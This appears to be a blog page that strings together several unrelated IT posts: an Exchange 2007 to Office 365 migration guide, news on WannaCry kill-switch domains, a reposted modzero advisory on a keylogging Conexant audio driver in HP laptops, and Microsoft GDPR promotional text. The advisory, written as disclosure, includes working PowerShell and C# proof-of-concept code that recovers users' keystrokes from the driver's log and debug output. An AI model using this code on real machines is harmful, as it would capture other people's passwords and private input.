Migrating Exchange to Office 365 Exchange Online

This method is the recommended if you are going to migrate your on premises Exchange 2007 to Office 365 (Exchange online plan) and then retire your on premises Exchange.

A cutover migration is the simplest way to get all your existing email into Office 365. As the name implies, it’s a cutover from one service to another. Cutover migrations are supported for Exchange 2003, 2007 and 2010; for organizations with fewer than 1000 mailboxes. The process is pretty straightforward, however, be sure to properly test the migration plan prior to trying to implement.

Step 1: Planning

Microsoft has done a great job of providing good quality information for administrators to use, to plan the migration to Office 365. It is always recommended to use the Exchange Deployment Assistant as a guide for all migrations. This site is up to date and will cover most of all the migrations scenarios to Office 365.

  1. Open the Exchange Deployment Assistant site.
  2. Once the site is launched, you are presented three options. Since I am doing a simple cutover migration from Exchange Server 2007, I am going to use the Cloud Only option.
  3. Click Cloud Only.
  4. You are now asked a series of questions on end state goals and existing setup.
  5. Answer all the questions.
  6. Click the Next arrow.
  7. The Exchange Deployment Assistant will generate a step by step guide for you to follow. Make sure to read and understand what you are doing.

Step 2: Testing the Existing Setup

Using the guide from the Exchange Deployment Assistant, we need to make sure that our Exchange 2007 infrastructure supports Outlook Anywhere (RPC over HTTP) and Autodiscover. Use the guide to verify the Exchange 2010 setup. Once the setup is verified to be correct, use the Microsoft Remote Connectivity Analyzer to verify Outlook Anywhere (RPC over HTTP). Make sure that you have assigned the correct permissions to the mailboxes that you are migrating.

  1. Open the Microsoft Remote Connectivity Analyzer site.
  2. Select the Outlook Anywhere (RPC over HTTP) test.
  3. Click Next.
  4. Enter all the information that is requested. You will want to verify that you are using Autodiscover to detect server settings.
  5. Enter the Verification code.
  6. Click Perform Test.

Once the test is successful, you can continue to the next step. If it’s successful with warnings, review the warnings and correct them if needed. If the test fails, use the report generated and the guide (Exchange Deployment Assistant) to resolve the issues.

Use the guide and assign the correct permissions to the mailboxes. If you don’t assign the migration account permissions on the mailboxes, they will not migrate.

Step 3: Configure Cutover Migration

  1. Open Internet Explorer.
  2. Login to the Office 365 Admin Center.
  3. Open Exchange Admin Center.

  4. Click Migration.

  5. Click the + drop down menu and select Migrate to Exchange Online.


  6. Select Cutover migration (supported by Exchange Server 2003 and later versions).


  7. Click Next.
  8. Enter on-premises account credentials (this is the same account that you gave full acccess permissions to on all the mailboxes).
  9. Click Next.

    When configured properly, Autodiscover should resovle the on-premise Exchange Server and the RPC Proxy Server

  10. Click Next.


  11. Enter a name for the New Migration Batch.
  12. Click Next.


  13. Select a user to get a report once the migration is completed. Multiple accounts can be selected. If you are ready to start the migration, then automatically start the batch. If you are not ready to start the migration, then select manually start the batch later.
  14. Click New.


     

  15. The new migration batch is created and the status is set to syncing.

  16. Depending on the number of accounts and the amount of data, this can take some time to migrate. Migration details can be viewed by clicking View Details under the Mailbox Status providing sight to the accounts being provisioned in Office 365 as well as the start of the sync from Exchange 2007 to Office 365.

Step 4: Completion of the Migration

When all the accounts are provisioned and the sync from Exchange 2007 to Office 365 is completed, you will get a report emailed to you. Once you get the report, you can complete the migration process.

  1. Migrate Public Folders – Microsoft has released a whitepaper for the companies that have public folders to migrate to Office 365. Migrating from Exchange Public Folders to Microsoft Office 365.
  2. Assign Office 365 licenses to all the users. all the DNS records are updated and pointed towards Office 365 services. Details can be found here.” href=”http://office.microsoft.com/en-us/office365-suite-help/manually-update-and-configure-desktops-for-office-365-HA104023514.aspx?CTT=1″ target=”_blank”>Details can be found here.
  3. Once you are comfortable that all the email is migrated to Office 365 and the MX record DNS replication is completed, you can stop the migration batch job.

At this point the migration is complete and the Exchange 2007 server can be retired but remember if you are planning to use a hybrid exchange deployment then you are going to need this server for future use. In Hybrid deployment there are 2 options either to use Exchange Sync Archive only or Exchange Sync Archive with single sign-on in case of you are using on premises AD and integrated it with Exchange.

Stop WannaCry Ransomware from infecting.

wannacry-2-ransomware-attack

If you are following the news, by now you might be aware that a security researcher has activated a “Kill Switch” which apparently stopped the WannaCry ransomware from spreading further.

But it’s not true, neither the threat is over yet.

However, the kill switch has just slowed down the infection rate.

Updated: Multiple security researchers have claimed that there are more samples of WannaCry out there, with different ‘kill-switch’ domains and without any kill-switch function, continuing to infect unpatched computers worldwide (find more details here).

So far, over 237,000 computers across 99 countries around the world have been infected, and the infection is still rising even hours after the kill switch was triggered by the 22-years-old British security researcher behind the twitter handle ‘MalwareTech.’

For those unaware, WannaCry is an insanely fast-spreading ransomware malware that leverages a Windows SMB exploit to remotely target a computer running on unpatched or unsupported versions of Windows.

Once infected, WannaCry also scans for other vulnerable computers connected to the same network, as well scans random hosts on the wider Internet, to spread quickly.

The SMB exploit, currently being used by WannaCry, has been identified as EternalBlue, a collection of hacking tools allegedly created by the NSA and then subsequently dumped by a hacking group calling itself “The Shadow Brokers” over a month ago.

“If NSA had privately disclosed the flaw used to attack hospitals when they *found* it, not when they lost it, this may not have happened,” NSA whistleblower Edward Snowden says.

Kill-Switch for WannaCry? No, It’s not over yet!

wannacry-ransomware-kill-switch

In our previous two articles, we have put together more information about this massive ransomware campaign, explaining how MalwareTech accidentally halted the global spread of WannaCry by registering a domain name hidden in the malware.

hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The above-mentioned domain is responsible for keeping WannaCry propagating and spreading like a worm, as I previously explained that if the connection to this domain fails, the SMB worm proceeds to infect the system.

Fortunately, MalwareTech registered this domain in question and created a sinkhole – tactic researchers use to redirect traffic from the infected machines to a self-controlled system. (read his latest blog post for more details)

Updated: Matthieu Suiche, a security researcher, has confirmed that he has found a new WannaCry variant with a different domain for kill-switch function, which he registered to redirect it to a sinkhole in an effort to slows down the infections.

hxxp://ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com/

The newly discovered WannaCry variant works exactly like the previous variant that wreaked havoc across the world Friday night.

But, if you are thinking that activating the kill switch has completely stopped the infection, then you are mistaken.

Since the kill-switch feature was in the SMB worm, not in the ransomware module itself., “WannaCrypt ransomware was spread normally long before this and will be long after, what we stopped was the SMB worm variant,” MalwareTech told The Hacker News.

You should know that the kill-switch would not prevent your unpatched PC from getting infected, in the following scenarios:

  • If you receive WannaCry via an email, a malicious torrent, or other vectors (instead of SMB protocol).
  • If by chance your ISP or antivirus or firewall blocks access to the sinkhole domain.
  • If the targeted system requires a proxy to access the Internet, which is a common practice in the majority of corporate networks.
  • If someone makes the sinkhole domain inaccessible for all, such as by using a large-scale DDoS attack.

MalwareTech also confirmed THN that some “Mirai botnet skids tried to DDoS the [sinkhole] server for lulz,” in order to make it unavailable for WannaCry SMB exploit, which triggers infection if the connection fails. But “it failed hardcore,” at least for now.

WannaCry 2.0, Ransomware With *NO* Kill-Switch Is On Hunt!

wannacry-2-ransomware-attack

Initially, this part of story was based on research of a security researcher, who earlier claimed to have the samples of new WannaCry ransomware that comes with no kill-switch function. But for some reason, he backed off. So, we have removed his references from this story for now.

However, shortly after that, we were confirmed by Costin Raiu, the director of global research and analysis team at Kaspersky Labs, that his team had seen more WannaCry samples on Friday that did not have the kill switch.

“I can confirm we’ve had versions without the kill switch domain connect since yesterday,” told The Hacker News.

Updated: WannaCry 2.0 is Someone Else’s Work


Raiu from Kaspersky shared some samples, his team discovered, with Suiche, who analysed them and just confirmed that there is a WannaCrypt variant without kill switch, and equipped with SMB exploit that would help it to spread rapidly without disruption.

What’s even worse is that the new WannaCry variant without a kill-switch believed to be created by someone else, and not the hackers behind the initial WannaCry ransomware.

“The patched version matt described does attempt to spread. It’s a full set which was modified by someone with a hex editor to disable the kill switch,” Raiu told me.

Updated: However, Suiche also confirmed that the modified variant with no kill switch is corrupted, but this doesn’t mean that other hackers and criminals would not come up with a working one.

“Given the high profile of the original attack, it’s going to be no surprise at all to see copycat attacks from others, and perhaps other attempts to infect even more computers from the original WannaCry gang. The message is simple: Patch your computers, harden your defences, run a decent anti-virus, and – for goodness sake – ensure that you have secure backups.” Cyber security expert Graham Cluley told The Hacker News.

Expect a new wave of ransomware attack, by initial attackers and new ones, which would be difficult to stop, until and unless all vulnerable systems get patched.

“The next attacks are inevitable, you can simply patch the existing samples with a hex editor and it’ll continue to spread,” Matthew Hickey, a security expert and co-founder of Hacker House told me.

“We will see a number of variants of this attack over the coming weeks and months so it’s important to patch hosts. The worm can be modified to spread other payloads not just WCry and we may see other malware campaigns piggybacking off this samples success.”

Even after WannaCry attacks made headlines all over the Internet and Media, there are still hundreds of thousands of unpatched systems out there that are open to the Internet and vulnerable to hacking.

“The worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host,” Microsoft says.

Believe me, the new strain of WannaCry 2.0 malware would not take enough time to take over another hundred of thousand vulnerable systems.

Apply the Windows Security patch and stop this ransomware from infecting you or your organization by applying these patch

https://www.catalog.update.microsoft.com/Search.aspx?q=kb4012598 Download the update for your system and apply it and if require please diactivate SMB/ICF file sharing feature from your windows systems.

Several HP laptops has keylogger in audio driver.

—————————————————————- v3 –
modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]
———————————————————————

———————————————————————
1. Timeline
———————————————————————

* 2017-04-28: Vulnerability has been discovered in MicTray64 version
1.0.0.31 / Thu Dec 24 08:35:35 2015
* 2017-04-28: Vendor Conexant contacted (Email)
* 2017-04-29: Higher impact has been discovered in most recent
MicTray64 version 1.0.0.46 / Tue Oct 11 10:56:13 2016
* 2017-04-30: CVE-2017-8360 has been assigned to this vulnerability.
* 2017-05-01: Contacted Hewlett-Packard Enterprise security advisor
with detailed description of the problem.
* 2017-05-02: Contacted vendor Conexant via Twitter
* 2017-05-05: Sent technical information to HPE security contact.
Informed HPE about releasing the advisory on Monday 8th
of May in case we don’t get any feedback on our report.
* 2017-05-05: Received some notes from HPE after sending technical
information. They tried to reach for security folks
at HP Inc. to gain attention.
* 2017-05-11: Release of the advisory

———————————————————————
2. Summary
———————————————————————

Vendor: Conexant Systems, Inc.

Software packages known to be affected:

* Recent and previous (Q2/2017) HP Audiodriver Packages /
Conexant High-Definition (HD) Audio Driver
Version 10.0.931.89 REV: Q PASS: 5
(ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.html)
* Probably other hardware vendors, shipping Conexant hardware and
drivers

Systems known to be affected:

According to HP information in sp79420.html, the following systems
are affected:

* HARDWARE PRODUCT MODEL(S):
HP EliteBook 820 G3 Notebook PC
HP EliteBook 828 G3 Notebook PC
HP EliteBook 840 G3 Notebook PC
HP EliteBook 848 G3 Notebook PC
HP EliteBook 850 G3 Notebook PC
HP ProBook 640 G2 Notebook PC
HP ProBook 650 G2 Notebook PC
HP ProBook 645 G2 Notebook PC
HP ProBook 655 G2 Notebook PC
HP ProBook 450 G3 Notebook PC
HP ProBook 430 G3 Notebook PC
HP ProBook 440 G3 Notebook PC
HP ProBook 446 G3 Notebook PC
HP ProBook 470 G3 Notebook PC
HP ProBook 455 G3 Notebook PC
HP EliteBook 725 G3 Notebook PC
HP EliteBook 745 G3 Notebook PC
HP EliteBook 755 G3 Notebook PC
HP EliteBook 1030 G1 Notebook PC
HP ZBook 15u G3 Mobile Workstation
HP Elite x2 1012 G1 Tablet
HP Elite x2 1012 G1 with Travel Keyboard
HP Elite x2 1012 G1 Advanced Keyboard
HP EliteBook Folio 1040 G3 Notebook PC
HP ZBook 17 G3 Mobile Workstation
HP ZBook 15 G3 Mobile Workstation
HP ZBook Studio G3 Mobile Workstation
HP EliteBook Folio G1 Notebook PC
* OPERATING SYSTEM(S):
Microsoft Windows 10 32
Microsoft Windows 10 64
Microsoft Windows 10 IOT Enterprise 32-Bit (x86)
Microsoft Windows 10 IOT Enterprise 64-Bit (x86)
Microsoft Windows 7 Enterprise 32 Edition
Microsoft Windows 7 Enterprise 64 Edition
Microsoft Windows 7 Home Basic 32 Edition
Microsoft Windows 7 Home Basic 64 Edition
Microsoft Windows 7 Home Premium 32 Edition
Microsoft Windows 7 Home Premium 64 Edition
Microsoft Windows 7 Professional 32 Edition
Microsoft Windows 7 Professional 64 Edition
Microsoft Windows 7 Starter 32 Edition
Microsoft Windows 7 Ultimate 32 Edition
Microsoft Windows 7 Ultimate 64 Edition
Microsoft Windows Embedded Standard 7 32
Microsoft Windows Embedded Standard 7E 32-Bit

CVE-ID: CVE-2017-8360
Severity: High/Medium
Type: Covert Storage Channel
Vendor: Conexant Systems, Inc.
Product: mic tray icon
Version: =< 1.0.0.46
Attack type: Local
Affected Components: Scheduled Task c:\windows\system32\mictray64.exe

———————————————————————
3. Details
———————————————————————

Conexant’s MicTray64.exe is installed with the Conexant audio driver
package and registered as a Microsoft Scheduled Task to run after each
user login. The program monitors all keystrokes made by the user to
capture and react to functions such as microphone mute/unmute
keys/hotkeys. Monitoring of keystrokes is added by implementing a low-
level keyboard input hook [1] function that is installed by calling
SetwindowsHookEx().

In addition to the handling of hotkey/function key strokes, all key-
scancode information [2] is written into a logfile in a world-readable
path (C:\Users\Public\MicTray.log). If the logfile does not exist or
the setting is not yet available in Windows registry, all keystrokes
are passed to the OutputDebugString API, which enables any process in
the current user-context to capture keystrokes without exposing
malicious behavior. Any framework and process with access to the
MapViewOfFile API should be able to silently capture sensitive data by
capturing the user’s keystrokes. In version 10.0.0.31, only
OutputDebugString was used to forward key scancodes and nothing was
written to files. The following pseudocode shows the registration of
the keylogging function handler of MicTray64.exe version 1.0.0.46:

int64 keylogger_enable(bool activate)
{
[…]
if ( !keylogger_active )
{
[…]
// 13=WH_KEYBOARD_LL: Installs a hook procedure that
// monitors low-level keyboard input events. For
// more information, see the LowLevelKeyboardProc
// hook procedure.
hKeyloggerHook = SetWindowsHookExW(
13, (HOOKPROC)handle_scancode,
hSelf,
0);

if ( hKeyloggerHook )
{
keylogger_active = 1;
return 0;
}
[…]
}

After registering function handle_scancode() as a handler to
any keystroke made by the user, the following pseudo-code is executed
every time a key is pressed or released:

LRESULT handle_scancode(
int _in_nCode,
WPARAM _in_wParam,
tagKBDLLHOOKSTRUCT *_in_lParam_keystroke)
{
tagKBDLLHOOKSTRUCT *key_stroke;
WPARAM wParam;
int nCode;
int64 target;
DWORD is_keyfoo;
int is_keydown;
char tmp;
int64 key_flags;
int64 key_vk;

key_stroke = _in_lParam_keystroke;
wParam = _in_wParam;
nCode = _in_nCode;

if ( _in_nCode >= 0 )
{
target = (cfg_HotKeyMicScancode >> 8 *
(cfg_HotKeyMicScancode_len – cfg_HotKeyMicScancode_len2));
LODWORD(key_vk) = _in_lParam_keystroke->vkCode;
LODWORD(key_flags) = _in_lParam_keystroke->flags;
is_keyfoo = _in_lParam_keystroke->flags & 1;
is_keydown = ~(key_flags >> 7) & 1;

[*] send_to_dbglog(
0x1D,
L”Mic target 0x%x scancode 0x%x flags 0x%x extra 0x%x vk 0x%x\n”,
target,
_in_lParam_keystroke->scanCode,
key_flags,
_in_lParam_keystroke->dwExtraInfo,
key_vk);

conexant_handle_fn_keys(
cfg_MicMuteScancodeSettings,
is_keydown,
key_stroke->scanCode,
target,
&cfg_HotKeyMicScancode_len,
&cfg_HotKeyMicScancode_len2,
1);

if ( cfg_MicMuteScancodeSettings & 4 )
conexant_handle_fn_keys(
cfg_MicMuteScancodeSettings,
is_keydown,
key_stroke->scanCode,
(cfg_HotKeyMicScancode2 >> 8 *
(cfg_HotKeyMicScancode2_len – cfg_HotKeyMicScancode2_len2)),
&cfg_HotKeyMicScancode2_len,
&cfg_HotKeyMicScancode2_len2,
1);

tmp = cfg_SpkMuteScancodeSettings;

if ( cfg_SpkMuteScancodeSettings & 8 && is_keyfoo
|| !(cfg_SpkMuteScancodeSettings & 8) )
{
conexant_handle_fn_keys(
cfg_SpkMuteScancodeSettings,
is_keydown,
key_stroke->scanCode,
(cfg_HotKeySpkScancode >> 8 *
(cfg_HotKeySpkScancode_len – cfg_HotKeySpkScancode_len2)),
&dword_1402709C8,
&dword_1402709CC,
0);
tmp = cfg_SpkMuteScancodeSettings;
}

if ( tmp & 4 && (tmp & 8 && is_keyfoo || !(tmp & 8)) )
conexant_handle_fn_keys(
tmp,
is_keydown,
key_stroke->scanCode,
(cfg_HotKeySpkScancode2 >> 8 *
(cfg_HotKeySpkScancode2_len – cfg_HotKeySpkScancode2_len2)),
&cfg_HotKeySpkScancode2_len,
&cfg_HotKeySpkScancode2_len2,
0);
}
return CallNextHookEx(hhk, nCode, wParam, key_stroke);
}

The function called at [*] writes every keystroke to a file or
broadcast it via Microsofts Debug Monitor APIs via store_keystroke():

void store_keystroke(LPCVOID lpBuffer)
{
WORD *scancode_logline;
int64 str_len;
DWORD NumberOfBytesWritten;
int str_newline;
scancode_logline = lpBuffer;
if ( g_write_to_logfile )
{
SetFilePointer(g_hFile, 0, 0, 2);
str_len = -1;

while ( scancode_logline[str_len++ + 1] != 0 )
;

WriteFile(
g_hFile,
scancode_logline,
2 * str_len,
&NumberOfBytesWritten,
0);

str_newline = ‘\n\0\r’;
WriteFile(g_hFile, &str_newline, 4, &NumberOfBytesWritten, 0);
}
else
{
OutputDebugStringW(lpBuffer);
}
}

This issue leads to a high risk of leaking sensitive user input to any
person or process that is able to read files in
C:\Users\Public\MicTray.log or call MapViewOfFile(). Investigators
with access to the unencrypted file-system might be able to recover
sensitive data of historic key-logs as well. Users are not aware that
every keystroke made while entering sensitive information – such as
passphrases, passwords on local or remote systems – are captured by
Conexant and exposed to any process and framework with access to the
file-system or MapViewOfFile API.
Additionally, this information-leak via Covert Storage Channel
enables malware authors to capture keystrokes without taking the risk
of being classified as malicious task by AV heuristics.

It is not recommended to provide information on keystrokes to
arbitrary processes by writing keystrokes to disk or by using
OutputDebugStringW() for debugging purposes.

———————————————————————
4. Impact
———————————————————————

Any process that is running in the current user-session and therefore
able to monitor debug messages, can capture keystrokes made by the
user. Processes are thus able to record sensitive data such as
passwords, without performing suspicious activities that may trigger
AV vendor heuristics. Furthermore, any process running on the system
by any user is able to access all keystrokes made by the user via
file-system access. It is not known, if log-data is submitted to
Conexant at any time or why all key presses are logged anyway.

———————————————————————
5. Proof of concept exploit
———————————————————————

A proof-of-concept can be implemented by using PowerShell to
parse MicTray.log:

$filename = “c:\users\public\MicTray.log”

[System.IO.FileStream] $fs = [System.IO.File]::Open(
$filename,
[System.IO.FileMode]::Open,
[System.IO.FileAccess]::Read,
[System.IO.FileShare]::ReadWrite)

[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(
$fs,
[Text.UTF8Encoding]::UNICODE)

$el = 0

while($el -lt 2) {

$line = $fr.ReadLine()

# handle broken newlines in log…
if([string]::IsNullOrEmpty($line)) {
$el++
} else {
$el=0
}

$mc = [regex]::Match($line,
“MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$”)
$r = $mc.Groups[2].Value

if(-Not [string]::IsNullOrEmpty($r)) {
$i = [convert]::ToInt32($r, 16)
$c = [convert]::ToChar($i)

if($i -lt 0x20 -or $i -gt 0x7E) { $c = ‘.’ }

write-host -NoNewLine $(“{0}” -f $c)
}
}

However, if no logfile is written, it is also possible to obtain
keystrokes by just following Microsoft’s DbMon Debug Monitor [3]
approach of capturing strings passed to OutputDebugString [4]:

namespace mod0_dbgview
{
class Program
{
public static void Main(string[] args)
{
DebugMonitor.Start();
DebugMonitor.OnOutputDebugString += new
OnOutputDebugStringHandler(OnOutputDebugString);
Console.WriteLine(“Press ‘Enter’ to exit.”);
Console.ReadLine();
DebugMonitor.Stop();
}
// version 1.0.0.46
private static void OnOutputDebugString(int pid, string text)
{
char sep = ‘ ‘;
char nl = ‘\n’;
text = text.TrimEnd(nl);
string[] items = text.Split(sep);
if (items[7].Equals(“Mic”))
{
int c_int = Convert.ToInt32(items[17], 16);
if (c_int == 0xd)
{
Console.WriteLine();
}
else if (Convert.ToInt32(items[13], 16) == 0x00)
Console.Write(“{0}”, (char)(c_int & 0xff));
}
}

// version 1.0.0.31
private static void OnOutputDebugString_v31(
int pid,
string text)
{
char sep = ‘ ‘;
string[] items = text.Split(sep);
if (items[0].Equals(“Mic”))
{
int c_int = Convert.ToInt32(items[10], 16);
if (c_int == 0xd)
{
Console.WriteLine();
}
else if(Convert.ToInt32(items[6], 16) == 0x00)
Console.Write(“{0}”, (char)(c_int & 0xff));
}
}
}
}

Any framework that provides an API down to ReadFile() or Microsoft’s
MapViewOfFile() should be able to capture keystrokes captured by
Conexant’s audio driver utils. By using Microsoft Windows Sysinternals
Dbgview [5], keystrokes can be visualized easily, if they are not
written to file.

———————————————————————
6. Workaround
———————————————————————

Delete MicTray executables and logfiles. Deleting the Scheduled
Task is not sufficient, as Conexant’s Windows Service CxMonSvc will
launch MicTray otherwise. The executable is located at
c:\Windows\System32\MicTray64.exe, the MicTray logfile is located at
C:\Users\Public\MicTray.log

———————————————————————
7. Fix
———————————————————————

It is not known to modzero, if a security fix is available.

———————————————————————
8. References
———————————————————————

[1] “LowLevelKeyboardProc callback function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx
[2] KBDLLHOOKSTRUCT structure –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644967(v=vs.85).aspx
[3] “DbMon: Implements a Debug Monitor” –
https://msdn.microsoft.com/en-us/library/aa242171(v=vs.60).aspx
[4] “MSDN/OutputDebugString function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
[5] “Microsoft Windows Sysinternals DebugView”
https://technet.microsoft.com/en-us/sysinternals/debugview.aspx
[6] “modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]” –
https://www.modzero.ch/advisories/MZ-17-01-Conexant-Keylogger.txt

SHA256 sums:
127163c863b320814b6f420390db9d5ce48e9158bdb62aa94e953d85ec1e7a89 *MicTray64_v31.exe
7245f89fa00ea5fe5b290758a99288188d58cdaf2f4192ce469a5f4d256eaae0 *MicTray64_v31.i64 (IDA Pro DB by April 29, 2017)
ba1bc46ae6a4a6ecca08028022163e6bba291c330b057c6235c33a7519e617b7 *MicTray64_v31.xml
c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8 *MicTray64_v46.exe
4563a0e4e85edeb7ddeba57d1cb8e4a30f1b5ee9fb128725a2664de2aa8c17ec *MicTray64_v46.i64 (IDA Pro DB by April 29, 2017)
ba1bc46ae6a4a6ecca08028022163e6bba291c330b057c6235c33a7519e617b7 *MicTray64_v46.xml

———————————————————————
9. Credits
———————————————————————

* Thorsten Schroeder

———————————————————————
10. About modzero
———————————————————————

The independent Swiss company modzero AG assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts,
software and hardware components as well as the development of
individual solutions. Colleagues at modzero AG work exclusively in
practical, highly technical computer-security areas and can draw on
decades of experience in various platforms, system concepts, and
designs.

https://www.modzero.ch
contact@modzero.ch

The General Data Protection Regulation (GDPR) for Office 365

In May 2018, a European privacy law is due to take effect that will require big changes, and potentially significant investments, by organizations all over the world—including Microsoft and our customers.

Known as the General Data Protection Regulation (GDPR), the law imposes new rules on companies, government agencies, non-profits, and other organizations that offer goods and services to people in the European Union (EU), or that collect and analyze data tied to EU residents. The GDPR applies no matter where you are located.

Microsoft believes the GDPR represents an important step forward for individual privacy rights. It gives EU residents more control over their “personal data” (which is precisely defined by the GDPR). The GDPR also seeks to ensure personal data is protected no matter where it is sent, processed, or stored. The law updates European privacy regulations for the first time in more than two decades, bringing them more in line with current technologies, and increases the uniformity of privacy regulations across the EU’s member states.

The GDPR is also a complex regulation that may require vast changes in how you gather and manage data. Microsoft has a long history of helping our customers comply with complex regulations. When it comes to preparing for the GDPR, we’ve got your back.

Supporting your journey to compliance with the GDPR

We want to help you focus on your core business while efficiently preparing for the GDPR. Our goal is to streamline your compliance with the GDPR through smart technology, innovation, and collaboration.

Microsoft products and services are available today to help you meet the GDPR requirements, and we are investing in additional features and functionality. Through our cloud services and on-premises solutions we’ll help you locate and catalog the personal data in your systems, build a more secure environment, simplify your management and monitoring of personal data, and give you the tools and resources you need to meet the GDPR reporting and assessment requirements.

We will share what we learn on our journey to compliance to make yours easier. We will show you how our existing enterprise products and services—such as Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server and Azure SQL Database, and Windows 10—can jumpstart that journey today.

Where do I start?

The GDPR contains many requirements about how you collect, store and use personal information. This means not only how you identify and secure the personal data in your systems, but also how you accommodate new transparency requirements, how you detect and report personal data breaches, and how you train privacy personnel and employees.

Given how much is involved, you should not wait until the regulation takes effect in May 2018 to prepare. You need to begin reviewing your privacy and data management practices now. Failure to comply with the GDPR could prove costly, as companies that do not meet the requirements and obligations could face substantial fines and reputational harm.

We recommend you begin your journey to compliance with the GDPR by focusing on four key steps:

(1) Discover: Identify what personal data you have and where it resides. (2) Manage: Govern how personal data is used and accessed. (3) Protect: Establish security controls to prevent, detect, and respond to vulnerabilities and data breaches. (4) Report: Keep required documentation, and continuously review and update your data protection policies and practices.

Microsoft products and services provide powerful solutions to tackle these steps in your journey to compliance with the GDPR.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server/Azure SQL Database, and Windows 10.

Microsoft’s commitment to the GDPR

The goals of the GDPR are consistent with Microsoft’s long-standing commitment to security, privacy, and transparency.

We are working to bring our products and services into compliance with the GDPR by May 2018. We are updating the features and functionality in all of our services to meet the GDPR requirements, and we are updating our documentation and our customer agreements to reflect the GDPR requirements.

Microsoft offers the most comprehensive set of compliance capabilities of any cloud service provider. And, we lead the industry in engaging with customers, regulatory bodies, and standards boards to advance compliance and serve customers’ needs. We will remain closely engaged with you as we prepare together for the GDPR to go into effect.

Microsoft designed Office and Office 365 with industry-leading security measures and privacy policies to safeguard your data in the cloud, including the categories of personal data identified by the GDPR. Office and Office 365 can help you on your journey to reducing risks and achieving compliance with the GDPR.

One essential step to meeting the GDPR obligations is discovering and controlling what personal data you hold and where it resides. There are a number of Office 365 solutions that can help you identify or manage access to personal data:

  • Data Loss Prevention (DLP) in Office and Office 365 can identify over 80 common sensitive data types including financial, medical, and personally identifiable information. In addition, DLP allows organizations to configure actions to be taken upon identification to protect sensitive information and prevent its accidental disclosure.
  • Advanced Data Governance uses intelligence and machine-assisted insights to help you find, classify, set policies on, and take action to manage the lifecycle of the data that is most important to your organization.
  • Office 365 eDiscovery search can be used to find text and metadata in content across your Office 365 assets—SharePoint Online, OneDrive for Business, Skype for Business Online, and Exchange Online. In addition, powered by machine learning technologies, Office 365 Advanced eDiscovery can help you identify documents that are relevant to a particular subject (for example, a compliance investigation) quickly and with better precision than traditional keyword searches or manual reviews of vast quantities of documents.
  • Customer Lockbox for Office 365 can help you meet compliance obligations for explicit data access authorization during service operations. When a Microsoft service engineer needs access to your data, access control is extended to you so that you can grant final approval for access. Actions taken are logged and accessible to you so that they can be audited.

Another core requirement of the GDPR is protecting personal data against security threats. Current Office 365 features that safeguard data and identify when a data breach occurs include:

  • Advanced Threat Protection in Exchange Online Protection helps protect your email against new, sophisticated malware attacks in real time. It also allows you to create policies that help prevent your users from accessing malicious attachments or malicious websites linked through email.
  • Threat Intelligence helps you proactively uncover and protect against advanced threats in Office 365. Deep insights into threats—provided by Microsoft’s global presence, the Intelligent Security Graph, and input from cyber threat hunters—help you quickly and effectively enable alerts, dynamic policies, and security solutions.
  • Advanced Security Management enables you to identify high-risk and abnormal usage, alerting you to potential breaches. In addition, it allows you to set up activity policies to track and respond to high risk actions.
  • Finally, Office 365 audit logs allow you to monitor and track user and administrator activities across workloads in Office 365, which help with early detection and investigation of security and compliance issues.

For more information please visit our Office 365 Trust Center.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, SQL Server/Azure SQL Database, and Windows 10.

For more detail visit the Microsoft Trust Center.